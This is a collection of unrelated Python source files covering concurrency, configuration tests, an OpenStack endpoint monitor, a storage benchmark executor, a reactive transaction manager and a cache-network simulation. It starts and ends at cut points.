concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_silicoin_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_silicoin_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_silicoin_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_silicoin_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_silicoin_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 56401
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written-to as a whole.
"""
# Artifically inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
santa_claus.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import threading
import time
import random
prob_falla = 0.03
num_renos = 9
num_elfos = 100
elfos_atorados = 0
umbral_elfo = 3
mutex_elfos = threading.Semaphore(1)
barrera_elfo = threading.Semaphore(0)
sem_santa = threading.Semaphore(0)
renos = []
renos_en_casa = 0
mutex_ctr_renos = threading.Semaphore(1)
barrera_renos = threading.Semaphore(0)
def elfo(yo):
global elfos_atorados
while True:
# Tiempo de fabricación del juguete canónico
time.sleep(2.5+random.random())
if random.random() < prob_falla:
print "¡El elfo %d tuvo un problema!" % yo
mutex_elfos.acquire()
elfos_atorados += 1
if elfos_atorados == umbral_elfo:
sem_santa.release()
for i in range(umbral_elfo):
barrera_elfo.release()
mutex_elfos.release()
barrera_elfo.acquire()
print "¡Santaaaa! Al elfo %d se le rompió su trabajo" % yo
def santa():
global elfos_atorados
print "¡Hola! Soy Santa y estoy vivo."
while True:
sem_santa.acquire()
mutex_elfos.acquire()
if elfos_atorados == umbral_elfo:
print "Vamos a arreglar %d juguetes..." % umbral_elfo
elfos_atorados -= umbral_elfo
else:
print "¡Hora de repartir regalos, jo jo jo jo!"
mutex_elfos.release()
def reno(yo):
global renos_en_casa
print "¡Hola! Soy el reno número %d y me voy de vacaciones." % yo
while True:
# Descansamos 11 meses y algunos días
time.sleep(11 + random.random() )
# Terminaron tus vacaciones.
mutex_ctr_renos.acquire()
print "Reno %d volviendo a casa" % yo
renos_en_casa += 1
if renos_en_casa == num_renos:
print "Despertando al rebaño"
for i in range(num_renos):
barrera_renos.release()
sem_santa.release()
mutex_ctr_renos.release()
print "Esperemos al resto del grupo... (%d)" % yo
barrera_renos.acquire()
print "¡Vámonos a repartir por todo el mundo!"
threading.Thread(target=santa, args=[]).start()
for i in range(num_renos):
threading.Thread(target=reno, args=[i]).start()
for i in range(num_elfos):
threading.Thread(target=elfo,args=[i]).start()
|
server.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import threading
import time
import openstack
from keystoneauth1.exceptions import ClientException
try:
from alertaclient.api import Client as alerta_client
except ImportError:
alerta_client = None
from apimon.lib import commandsocket
from apimon.lib.statsd import get_statsd
COMMANDS = ['stop', 'pause', 'resume', 'reconfig']
class EndpointMonitor(threading.Thread):
"""A thread that checks endpoints. """
log = logging.getLogger("apimon.EndpointMonitor")
def __init__(self, config, target_cloud,
zone: str = None, alerta: dict = None) -> None:
threading.Thread.__init__(self)
self.log.info('Starting watching %s cloud' % target_cloud)
self.daemon = True
self.wake_event = threading.Event()
self._stopped = False
self._pause = False
self.config = config
self.alerta = alerta
self.conn = None
self.service_override = None
self.interval = int(self.config.get_default(
'epmon', 'interval', 5))
self.influx_cnf = self.config.get_default(
'metrics', 'influxdb', {}).copy()
self.zone = zone
self.statsd_extra_keys = {
'zone': self.zone
}
self.statsd = get_statsd(
self.config,
self.statsd_extra_keys)
self.target_cloud = target_cloud
self.reload()
def stop(self) -> None:
self._stopped = True
self.wake_event.set()
def pause(self) -> None:
self._pause = True
def resume(self) -> None:
self._pause = False
def reload(self) -> None:
for cl in self.config.get_default('epmon', 'clouds', []):
if isinstance(cl, dict):
if len(cl.items()) != 1:
raise RuntimeError(
'Can not parse epmon clouds configuration')
(target_cloud, vals) = list(cl.items())[0]
else:
(target_cloud, vals) = cl, {}
if target_cloud != self.target_cloud:
continue
self.service_override = vals.get('service_override')
try:
self.interval = int(vals.get('interval', 5))
except Exception:
self.interval = 5
self.log.debug('Need to monitor cloud %s' % target_cloud)
auth_part = None
for cnf in self.config.config.get('clouds', []):
if cnf.get('name') == self.target_cloud:
auth_part = cnf.get('data')
if self.influx_cnf and 'additional_metric_tags' in auth_part:
self.influx_cnf['additional_metric_tags'] = \
auth_part['additional_metric_tags']
if not auth_part:
raise RuntimeError('Requested cloud %s is not found' %
target_cloud)
override_measurement = self.config.get_default('epmon', 'measurement')
if override_measurement and self.influx_cnf:
self.influx_cnf['measurement'] = override_measurement
self.region = openstack.config.get_cloud_region(
load_yaml_config=False,
**auth_part)
if self.influx_cnf:
self.region._influxdb_config = self.influx_cnf
statsd_config = self.config.get_default('metrics', 'statsd')
if statsd_config:
# Inject statsd reporter
self.region._statsd_host = statsd_config.get('host', 'localhost')
self.region._statsd_port = int(statsd_config.get('port', 8125))
self.region._statsd_prefix = (
'openstack.api.{environment}.{zone}'
.format(
environment=self.target_cloud,
zone=self.zone)
)
self._connect()
def run(self) -> None:
self._connect()
while True:
if self._stopped:
return
if not self.conn:
# Not sure whether it works if we loose connection
self._connect()
try:
if self._pause:
# Do not send heartbeat as well to not to forget to resume
continue
if self.conn:
self._execute()
if self.alerta:
try:
self.alerta.heartbeat(
origin='apimon.epmon.%s.%s' % (
self.zone, self.target_cloud),
tags=['apimon', 'epmon'],
attributes={
'zone': self.zone,
'cloud': self.target_cloud,
'service': ['apimon', 'epmon'],
}
)
except Exception:
self.log.exception('Error sending heartbeat')
time.sleep(self.interval)
except Exception:
self.log.exception("Exception checking endpoints:")
def _connect(self):
try:
self.conn = openstack.connection.Connection(
config=self.region,
)
except AttributeError as e:
# NOTE(gtema): SDK chains attribute error when calling
# conn.authorize, but response is not present
self.log.error('Cannot establish connection: %s' % e.__context__)
self.send_alert('identity', e.__context__)
except Exception as ex:
self.log.exception('Cannot establish connection to cloud %s: %s' %
(self.target_cloud, ex))
self.send_alert('identity', 'ConnectionException', str(ex))
def _execute(self):
eps = self.conn.config.get_service_catalog().get_endpoints().items()
for service, data in eps:
endpoint = data[0]['url']
self.log.debug('Checking service %s' % service)
srv = None
sdk_srv = None
try:
srv = self.service_override.get(service)
if not srv and service in self.service_override:
# If we have empty key in overrides means we might want to
# disable service
srv = {}
sdk_srv = srv.get('service', service)
client = getattr(self.conn, sdk_srv)
except (KeyError, AttributeError):
client = self.conn.config.get_session_client(service)
if srv is not None:
urls = srv.get('urls', [])
if urls:
for url in urls:
if isinstance(url, str):
self._query_endpoint(client, service,
endpoint, url)
else:
self.log.error('Wrong configuration, '
'service_override must be list of '
'string urls')
else:
self.log.debug('Skipping querying service %s' % service)
else:
self._query_endpoint(client, service, endpoint, endpoint)
def _query_endpoint(self, client, service, endpoint, url):
response = None
error = None
try:
response = client.get(
url,
headers={'content-type': 'application/json'},
timeout=5)
except (openstack.exceptions.SDKException, ClientException) as ex:
error = ex
self.log.error('Got exception for endpoint %s: %s' % (url,
ex))
except Exception:
self.log.exception('Got uncatched exception doing request to %s' %
url)
status_code = -1
if response is not None:
status_code = int(response.status_code)
if error or status_code >= 500:
if endpoint != url:
query_url = openstack.utils.urljoin(endpoint, url)
else:
query_url = url
result = status_code if status_code != -1 else 'Timeout(5)'
value = (
'curl -g -i -X GET %s -H '
'"X-Auth-Token: ${TOKEN}" '
'-H "content-type: application/json" fails (%s)' % (
query_url, result)
)
self.send_alert(
resource=service,
value=value,
raw_data=str(error.message if error else response)
)
def send_alert(self, resource: str, value: str,
raw_data: str=None) -> None:
if self.alerta:
self.alerta.send_alert(
severity='critical',
environment=self.target_cloud,
service=['apimon', 'endpoint_monitor'],
origin='apimon.epmon.%s.%s' % (
self.zone, self.target_cloud),
resource=resource,
event='Failure',
value=value,
raw_data=raw_data
)
else:
self.log.error('Got error from the endpoint check, but '
'cannot report it to alerta')
class EndpointMonitorServer:
log = logging.getLogger('apimon.EndpointMonitorServer')
def __init__(self, config, zone: str = None):
self.log.info('Starting EndpoinMonitor service')
self.config = config
self._running = False
self.run_lock = threading.Lock()
self.command_map = dict(
stop=self.stop,
pause=self.pause,
resume=self.resume,
reconfig=self.reconfig
)
command_socket = self.config.get_default(
'epmon', 'socket',
'/var/lib/apimon/epmon.socket')
self.command_socket = commandsocket.CommandSocket(command_socket)
self._command_running = False
self._monitors = {}
self.alerta = None
self.zone = zone or self.config.get_default(
'epmon', 'zone', 'default_zone')
# self.accepting_work = False
def _connect_alerta(self) -> None:
if alerta_client:
alerta_ep = self.config.get_default('alerta', 'endpoint')
alerta_token = self.config.get_default('alerta', 'token')
if alerta_ep and alerta_token:
self.alerta = alerta_client(
endpoint=alerta_ep,
key=alerta_token)
def start(self):
self._running = True
self._command_running = True
self.log.debug("Starting command processor")
self.command_socket.start()
self.command_thread = threading.Thread(
target=self.run_command, name='command')
self.command_thread.daemon = True
self.command_thread.start()
self._connect_alerta()
for cl in self.config.get_default('epmon', 'clouds', []):
if isinstance(cl, dict):
if len(cl.items()) != 1:
raise RuntimeError(
'Can not parse epmon clouds configuration')
target_cloud = list(cl.keys())[0]
else:
target_cloud = cl
self.log.debug('Need to monitor cloud %s' % target_cloud)
self._monitors[target_cloud] = EndpointMonitor(
self.config, target_cloud=target_cloud,
zone=self.zone, alerta=self.alerta)
self._monitors[target_cloud].start()
def stop(self):
self.log.debug("Stopping")
with self.run_lock:
self._running = False
self._command_running = False
monitors = list(self._monitors.values())
self.command_socket.stop()
for mon in monitors:
try:
mon.stop()
mon.join()
except Exception:
self.log.exception("Exception stoping monitoring thread")
self.log.info("Stopped")
def join(self):
pass
def pause(self):
self.log.debug('Pausing')
with self.run_lock:
monitors = list(self._monitors.values())
for mon in monitors:
mon.pause()
def reconfig(self, config=None) -> None:
self.log.debug('Reconfiguration')
if not config:
self.config.read()
with self.run_lock:
monitors = list(self._monitors.values())
for mon in monitors:
mon.reload()
def resume(self):
self.log.debug('Resuming')
with self.run_lock:
monitors = list(self._monitors.values())
for mon in monitors:
mon.resume()
def run_command(self):
while self._command_running:
try:
command = self.command_socket.get().decode('utf8')
if command != '_stop':
self.command_map[command]()
except Exception:
self.log.exception("Exception while processing command")
|
test_executor.py
|
##############################################################################
# Copyright (c) 2016 EMC and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
import copy
import imp
import json
import logging
from os import listdir
import os
from os.path import isfile, join
import sched
from threading import Thread
from time import sleep
import time
from storperf.carbon.converter import Converter
from storperf.carbon.emitter import CarbonMetricTransmitter
from storperf.db.job_db import JobDB
from storperf.fio.fio_invoker import FIOInvoker
from storperf.utilities.data_handler import DataHandler
from storperf.utilities.thread_gate import ThreadGate
class UnknownWorkload(Exception):
pass
class TestExecutor(object):
def __init__(self):
self.logger = logging.getLogger(__name__)
self.workload_modules = []
self.filename = None
self.deadline = None
self.steady_state_samples = 10
self.start_time = None
self.end_time = None
self.current_workload = None
self.workload_status = {}
self.result_url = None
self._queue_depths = [1, 4, 8]
self._block_sizes = [512, 4096, 16384]
self.event_listeners = set()
self.metrics_converter = Converter()
self.metrics_emitter = CarbonMetricTransmitter()
self.prefix = None
self.job_db = JobDB()
self._slaves = []
self._terminated = False
self._workload_executors = []
self._workload_thread = None
self._thread_gate = None
self._setup_metadata({})
def _setup_metadata(self, metadata={}):
try:
installer = os.environ['INSTALLER_TYPE']
except KeyError:
self.logger.error("Cannot determine installer")
installer = "Unknown_installer"
self.metadata = {}
self.metadata['project_name'] = 'storperf'
self.metadata['installer'] = installer
self.metadata['pod_name'] = 'Unknown'
self.metadata['version'] = 'Unknown'
self.metadata['scenario'] = 'Unknown'
self.metadata['build_tag'] = 'Unknown'
self.metadata['test_case'] = 'Unknown'
self.metadata['details'] = {}
self.metadata['details']['metrics'] = {}
self.metadata.update(metadata)
self.metadata['case_name'] = self.metadata['test_case']
@property
def slaves(self):
return self._slaves
@slaves.setter
def slaves(self, slaves):
self.logger.debug("Set slaves to: " + str(slaves))
self._slaves = slaves
@property
def queue_depths(self):
return ','.join(self._queue_depths)
@queue_depths.setter
def queue_depths(self, queue_depths):
self.logger.debug("Set queue_depths to: " + str(queue_depths))
self._queue_depths = queue_depths.split(',')
@property
def block_sizes(self):
return ','.join(self._block_sizes)
@property
def terminated(self):
return self._terminated
@block_sizes.setter
def block_sizes(self, block_sizes):
self.logger.debug("Set block_sizes to: " + str(block_sizes))
self._block_sizes = block_sizes.split(',')
def register(self, event_listener):
self.event_listeners.add(event_listener)
def unregister(self, event_listener):
self.event_listeners.discard(event_listener)
def event(self, callback_id, metric):
carbon_metrics = self.metrics_converter.convert_json_to_flat(
metric,
callback_id)
self.metrics_emitter.transmit_metrics(carbon_metrics, callback_id)
commit_count = 10
while (commit_count > 0 and
not self.metrics_emitter.confirm_commit(callback_id)):
self.logger.info("Waiting 1 more second for commit")
sleep(1)
commit_count -= 1
if self._thread_gate.report(callback_id):
self.broadcast_event()
def broadcast_event(self):
for event_listener in self.event_listeners:
try:
self.logger.debug("Notifying event listener %s",
event_listener)
event_listener(self)
except Exception, e:
self.logger.exception("While notifying listener %s", e)
def register_workloads(self, workloads):
self.workload_modules = []
if (workloads is None or len(workloads) == 0):
workload_dir = os.path.normpath(
os.path.join(os.path.dirname(__file__), "workloads"))
workload_files = [
f for f in listdir(workload_dir)
if isfile(join(workload_dir, f))]
workloads = []
for filename in workload_files:
mname, _ = os.path.splitext(filename)
if (not mname.startswith('_')):
workloads.append(mname)
else:
workloads = workloads.split(',')
for workload in workloads:
try:
workload_module = self.load_from_file("workloads/" +
workload + ".py")
self.logger.debug("Found: " + str(workload_module))
if(workload_module is None):
raise UnknownWorkload(
"ERROR: Unknown workload: " + workload)
if workload_module not in self.workload_modules:
self.workload_modules.append(workload_module)
except ImportError, err:
raise UnknownWorkload("ERROR: " + str(err))
def load_from_file(self, uri):
uri = os.path.normpath(os.path.join(os.path.dirname(__file__), uri))
path, fname = os.path.split(uri)
mname, _ = os.path.splitext(fname)
no_ext = os.path.join(path, mname)
self.logger.debug("Looking for: " + no_ext)
if os.path.exists(no_ext + '.pyc'):
self.logger.debug("Loading compiled: " + mname + " from " + no_ext)
return imp.load_compiled(mname, no_ext + '.pyc')
if os.path.exists(no_ext + '.py'):
self.logger.debug("Compiling: " + mname + " from " + no_ext)
return imp.load_source(mname, no_ext + '.py')
return None
def execute(self, metadata):
self.job_db.create_job_id()
self.job_db.record_workload_params(metadata)
self._setup_metadata(metadata)
self._workload_thread = Thread(target=self.execute_workloads,
args=(),
name="Workload thread")
self._workload_thread.start()
return self.job_db.job_id
def terminate(self):
self._terminated = True
self.end_time = time.time()
return self.terminate_current_run()
def terminate_current_run(self):
self.logger.info("Terminating current run")
terminated_hosts = []
for workload in self._workload_executors:
workload.terminate()
terminated_hosts.append(workload.remote_host)
return terminated_hosts
def execution_status(self, job_id):
result = {}
status = "Completed"
if self.job_db.job_id == job_id and self._terminated is False:
status = "Running"
result['Status'] = status
result['Workloads'] = self.workload_status
result['TestResultURL'] = self.result_url
else:
jobs = self.job_db.fetch_jobs()
self.logger.info("Jobs")
self.logger.info(jobs)
for job in jobs:
if self.job_db.job_id == job_id and self._terminated is False:
status = "Running"
result['Status'] = status
result['Workloads'] = self.workload_status
result['TestResultURL'] = self.result_url
else:
result[job] = {}
result[job]['Status'] = "Completed"
return result
def execute_workloads(self):
self._terminated = False
self.logger.info("Starting job %s" % (self.job_db.job_id))
self.event_listeners.clear()
data_handler = DataHandler()
self.register(data_handler.data_event)
self.start_time = time.time()
self.workload_status = {}
workloads = self._create_workload_matrix()
for current_workload in workloads:
workload = current_workload['workload']
self._thread_gate = ThreadGate(len(self.slaves),
workload.options['status-interval'])
if self._terminated:
return
self.current_workload = current_workload['name']
self.logger.info("Starting run %s" % self.current_workload)
self.workload_status[self.current_workload] = "Running"
scheduler = sched.scheduler(time.time, time.sleep)
if self.deadline is not None \
and not current_workload['workload_name'].startswith("_"):
event = scheduler.enter(self.deadline * 60, 1,
self.terminate_current_run,
())
t = Thread(target=scheduler.run, args=())
t.start()
workload.options['iodepth'] = str(current_workload['queue-depth'])
workload.options['bs'] = str(current_workload['blocksize'])
slave_threads = []
for slave in self.slaves:
slave_workload = copy.copy(current_workload['workload'])
slave_workload.remote_host = slave
self._workload_executors.append(slave_workload)
t = Thread(target=self.execute_on_node,
args=(slave_workload,),
name="%s worker" % slave)
t.daemon = False
t.start()
slave_threads.append(t)
for slave_thread in slave_threads:
self.logger.debug("Waiting on %s" % slave_thread)
slave_thread.join()
self.logger.debug("Done waiting for %s" % slave_thread)
if not scheduler.empty():
try:
scheduler.cancel(event)
except ValueError:
pass
self.logger.info("Completed run %s"
% self.current_workload)
self.workload_status[self.current_workload] = "Completed"
self._workload_executors = []
self.current_workload = None
self.logger.info("Completed job %s" % (self.job_db.job_id))
self.end_time = time.time()
self._terminated = True
self.broadcast_event()
self.unregister(data_handler.data_event)
report = {'report': json.dumps(self.metadata)}
self.job_db.record_workload_params(report)
self.job_db.job_id = None
if self.result_url is not None:
self.logger.info("Results can be found at %s" % self.result_url)
def _create_workload_matrix(self):
workloads = []
for workload_module in self.workload_modules:
workload_name = getattr(workload_module, "__name__")
constructorMethod = getattr(workload_module, workload_name)
workload = constructorMethod()
if (self.filename is not None):
workload.filename = self.filename
workload.id = self.job_db.job_id
if (self.filename is not None):
workload.filename = self.filename
if (workload_name.startswith("_")):
iodepths = [8, ]
blocksizes = [16384, ]
else:
iodepths = self._queue_depths
blocksizes = self._block_sizes
for blocksize in blocksizes:
for iodepth in iodepths:
name = '%s.%s.queue-depth.%s.block-size.%s' % \
(self.job_db.job_id, workload_name, iodepth, blocksize)
self.workload_status[name] = "Pending"
parameters = {'queue-depth': iodepth,
'blocksize': blocksize,
'name': name,
'workload_name': workload_name,
'status': 'Pending',
'workload': workload}
self.logger.info("Workload %s=%s" % (name, parameters))
workloads.append(parameters)
return workloads
def execute_on_node(self, workload):
invoker = FIOInvoker(self.metadata)
invoker.register(self.event)
workload.invoker = invoker
self.logger.info("Starting " + workload.fullname)
self.job_db.start_workload(workload)
workload.execute()
self.job_db.end_workload(workload)
invoker.unregister(self.event)
self.logger.info("Ended " + workload.fullname)
|
ReactiveManager.py
|
import threading
import time
import sys
sys.path.append("../../build/bindings/python")
from libpydiamond import *
from twisted.internet import reactor
NO_NOTIFICATION = 18446744073709551615L
funcArgMap = dict() # function <-> arguments map
idFuncMap = dict() # reactive_id <-> function map
funcIdMap = dict() # function <-> reactive_id map
nextId = 0
cv = threading.Condition()
def runInBackground(target, *args, **kwargs):
threading.Thread(target=target, args=args, kwargs=kwargs).start()
#reactor.callInThread(target, *args, **kwargs)
def start():
NotificationInit(callback)
thread = threading.Thread(target=run, args=())
thread.daemon = True
thread.start()
def callback():
cv.acquire()
cv.notify()
cv.release()
def run():
while True:
cv.acquire()
cv.wait()
cv.release()
reactive_id = DObject.GetNextNotification(False)
while reactive_id != NO_NOTIFICATION:
func = idFuncMap[reactive_id]
DObject.BeginReactive(reactive_id)
func(*funcArgMap[func])
DObject.TransactionCommit()
reactive_id = DObject.GetNextNotification(False)
def reactive_txn(func, *args):
reactive_id = generateId()
idFuncMap[reactive_id] = func
funcIdMap[func] = reactive_id
funcArgMap[func] = args
runInBackground(reactive_txn_helper, reactive_id, func, *args)
def reactive_txn_helper(reactive_id, func, *args):
DObject.BeginReactive(reactive_id)
func(*args)
DObject.TransactionCommit()
def reactive_stop(func):
reactive_id = funcIdMap[func]
del idFuncMap[reactive_id]
del funcIdMap[func]
del funcArgMap[func]
runInBackground(reactive_stop_helper, reactive_id)
def reactive_stop_helper(reactive_id):
DObject.Deregister(reactive_id)
def txn_execute(func, *args):
runInBackground(txn_execute_helper, func, *args)
def txn_execute_helper(func, *args):
DObject.TransactionBegin()
func(*args)
DObject.TransactionCommit()
cv.acquire()
cv.notify()
cv.release()
def generateId():
global nextId
ret = nextId
nextId = nextId + 1
return ret
|
runner.py
|
import sys
import random
from multiprocessing import Process
from cache import *
from network import *
# The number of times each experiment is run
runs = 10
def run_simulation(T, net, prefixes, caches, auxiliary_distribution, request_distribution):
global runs
results = []
cache_indexes = range(len(caches))
num_consumers = len(net.get_consumers())
for r in range(runs):
for t in range(T):
consumer_index = random_range(0, num_consumers - 1)
consumer = net.get_consumers()[consumer_index]
identity, index = request_distribution.sample()
# This should select a random packet from the request
# distribution, and then a random prefix from the set of prefixes
# prefix_index = random_range(0, len(prefixes) - 1)
# packet = Packet(prefixes[prefix_index], packet.identity)
random.shuffle(cache_indexes)
for i in cache_indexes:
cache = caches[i]
if cache.lookup(identity):
new_packet = Packet(cache.prefix, identity)
consumer.process_packet(new_packet)
break
# Collect the observed results, generate the histograms, and then run the attack
observer = net.merge_observers()
aux_hist = auxiliary_distribution.histogram(T)
observed_hist = observer.histogram(request_distribution.domain())
# print aux_hist
# print observed_hist
result = freq_attack(observed_hist, aux_hist, request_distribution, T)
results.append(result)
return results
def create_network(net_functor, distributed_caches, adv_p, cache_p, num_consumers = 10):
net = net_functor(distributed_caches, adv_p, cache_p, 0.0, num_consumers)
for producer in net.get_producers():
# print >> sys.stderr, "Propagating %s from %s" % (producer.get_prefix(), producer.name)
net.propogate_route(producer, producer.get_prefix())
# net.to_dot(data_prefix(params_to_id(T, N, S, P)) + ".dot")
# net.to_dot("net_%f_%f_%d.dot" % (adv_p, cache_p, num_consumers))
return net
def create_content_split(prefixes, N, S):
content_universe = Cache(prefixes[0])
content_universe.populate(N, S)
if len(prefixes) > 1:
distributed_caches = content_universe.split(prefixes)
else:
distributed_caches = [content_universe]
return distributed_caches, content_universe
def create_content_replicate(prefixes, N, S):
content_universe = Cache(prefixes[0])
content_universe.populate(N, S)
if len(prefixes) > 1:
distributed_caches = content_universe.replicate(prefixes)
else:
distributed_caches = [content_universe]
return distributed_caches, content_universe
def create_prefixes(P):
prefixes = []
for i in range(P):
prefixes.append("prefix-%d" % i)
return prefixes
def simulate(T, N, S, P, C, content_func, net_func, request_func, aux_func, adv_p, cache_p, output):
prefixes = create_prefixes(P)
distributed_caches, universe = content_func(prefixes, N, S)
net = create_network(net_func, distributed_caches, adv_p, cache_p, C)
aux_dist = aux_func(universe)
request_dist = request_func(universe)
results = run_simulation(T, net, prefixes, distributed_caches, aux_dist, request_dist)
distance = kolmogorov_smirnov(request_dist, aux_dist)
mp = compute_average_match_percent(results)
cdf = compute_average_cdf(results)
with open(output, "w") as fh:
fh.write(str(distance))
fh.write("\n")
fh.write(str(mp))
fh.write("\n")
fh.write(str(cdf))
fh.write("\n")
return distance, mp, cdf
def create_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_split, net_func, request_func, aux_func, adv_p, cache_p, output))
return p
def start_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_split, net_func, request_func, aux_func, adv_p, cache_p, output))
p.start()
return p
def create_split_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_split, net_func, request_func, aux_func, adv_p, cache_p, output))
return p
def start_split_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = create_split_simulation(T, N, S, P, C, net_func, request_func, aux_func, adv_p, cache_p, output, C)
p.start()
return p
def create_replicate_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_replicate, net_func, request_func, aux_func, adv_p, cache_p, output))
return p
def start_replicate_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = create_replicate_simulation(T, N, S, P, C, create_content_replicate, net_func, request_func, aux_func, adv_p, cache_p, output)
p.start()
return p
|
test_integer_incrementer.py
|
import threading
from typing import List, Set
from json import dumps as jsondumps
import pytest
import gevent
from gevent.greenlet import Greenlet
from grizzly.testdata.variables.integer_incrementer import atomicintegerincrementer__base_type__
from grizzly.testdata.variables import AtomicIntegerIncrementer
from ....fixtures import AtomicVariableCleanupFixture
def test_atomicintegerincrementer__base_type__() -> None:
assert atomicintegerincrementer__base_type__(10) == '10'
assert atomicintegerincrementer__base_type__('10') == '10'
assert atomicintegerincrementer__base_type__('10 | step=2') == '10 | step=2'
assert atomicintegerincrementer__base_type__('10|step=35') == '10 | step=35'
assert atomicintegerincrementer__base_type__('1| step=20') == '1 | step=20'
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('10 |')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('10 | asdf')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('|')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('asdf|')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('asdf| step=asdf')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('10 | step=asdf')
with pytest.raises(ValueError) as ve:
atomicintegerincrementer__base_type__('10 | step=1, iterations=10')
assert 'argument iterations is not allowed'
with pytest.raises(ValueError) as ve:
atomicintegerincrementer__base_type__('10 | iterations=10')
assert 'step is not specified' in str(ve)
with pytest.raises(ValueError) as ve:
